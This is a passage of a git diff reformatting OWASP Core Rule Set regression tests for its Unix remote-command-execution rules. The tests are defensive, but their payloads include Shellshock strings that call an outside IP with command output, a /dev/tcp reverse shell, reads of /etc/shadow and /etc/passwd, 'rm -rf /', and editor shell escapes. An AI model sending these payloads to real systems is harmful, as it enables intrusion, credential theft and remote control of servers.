text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 18 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 19 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 20 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 21 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 22 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 23 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 24 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 25 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 27 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 28 desc: Test RCE with new semantic versions - ;gcc10.1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;gcc10.1<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 37 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 38 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 39 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 40 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 41 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 42 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 43 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 44 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 45 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-46 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 46 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - no_log_contains: id "932230" - - test_title: 932230-47 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + no_log_contains: id "932230" + - test_id: 47 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;environment" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-48 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;environment" + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 48 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 49 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;env --version" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;env --version" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 50 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<, azurit" description: Tests for fix of 932231 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886 - enabled: true - name: 932231.yaml + rule_id: 932231 tests: - - test_title: 932231-1 + - test_id: 1 desc: | True Negative Rule Integrity 1 arg value of "ifconfig;. rm -rf /; Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.0 - output: - log_contains: id "932231" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.0 + output: + log_contains: id "932231" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index 26f808924..08692c1c1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -2,128 +2,120 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Unix Command Injection" - enabled: true - name: 932232.yaml +rule_id: 932232 tests: - - test_title: 932232-1 + - test_id: 1 desc: "/?arg=;ps" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%3Bps" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%3Bps" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 2 desc: "/?arg=|vi (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%7Cvi%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%7Cvi%20%28x" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 3 desc: "/?arg=&w (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26w%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 